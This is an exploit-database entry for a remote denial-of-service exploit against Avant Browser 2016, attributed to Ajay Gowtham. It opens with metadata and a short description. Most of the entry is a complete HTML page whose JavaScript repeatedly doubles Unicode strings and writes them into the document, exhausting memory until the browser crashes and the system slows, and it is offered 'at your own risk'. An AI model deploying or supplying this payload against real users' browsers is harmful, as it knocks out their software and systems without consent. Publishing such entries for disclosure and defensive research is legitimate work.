Avant Browser Remote DoS Exploit

2016.12.12
Credit: Ajay Gowtham
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#(+)Exploit Title: Avant Browser Remote DoS Exploit #(+)Created By: Ajay Gowtham aka AJOXR #(+)Software : Avant Browser #(+)Tested On : Win-10-x64 #(+) E-mail : gowtham.ajay5()gmail.com #About Browser: Avant Browser is an ultra-fast web browser. Its user-friendly interface brings a new level of clarity and efficiency to your browsing experience, and frequent upgrades have steadily improved its reliability. #Exploit Description : It allows to crash the browser and throttle system usage. Reboot may be required. ------------------------EXPLOIT CODE------------------------------------- //sploit.html <html> <title>Boom</title> <head> <h1>Avant Browser 2016 build 17, Stable Release</h1> <p>Tested only on Windows 10 x64</p> <p>Use at your own Risk</p> </p>Exploit: Not Enough Free System Memory DoS Exploit. Perfectely Works Only on Avant Browser 2016</p> <script> function dos() { var longunistring1 = unescape("%u4141%u4141"); var longunistring2 = unescape("%u4242%u4242"); var longunistring3 = unescape("%u4343%u4343"); var longunistring4 = unescape("%u4444%u4444"); var longunistring5 = unescape("%u4545%u4545"); var longunistring6 = unescape("%u4646%u4646"); var longunistring7 = unescape("%u4747%u4747"); for(i=0; i <= 950 ; ++i) { longunistring1+=longunistring1; longunistring2+=longunistring2; longunistring3+=longunistring3; longunistring4+=longunistring4; longunistring5+=longunistring5; longunistring6+=longunistring6; longunistring7+=longunistring7; document.write(longunistring1); document.write(longunistring2); document.write(longunistring3); document.write(longunistring4); document.write(longunistring5); document.write(longunistring6); document.write(longunistring7); } document.write(longunistring1); document.write(longunistring2); document.write(longunistring3); document.write(longunistring4); document.write(longunistring5); document.write(longunistring6); document.write(longunistring7); } </script> </head> <body> <input type="button" value="Pwd!" onclick="dos();"> </body> </html> Solution ====== An update will be a solution. # Contacted vendor, no response for long time.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top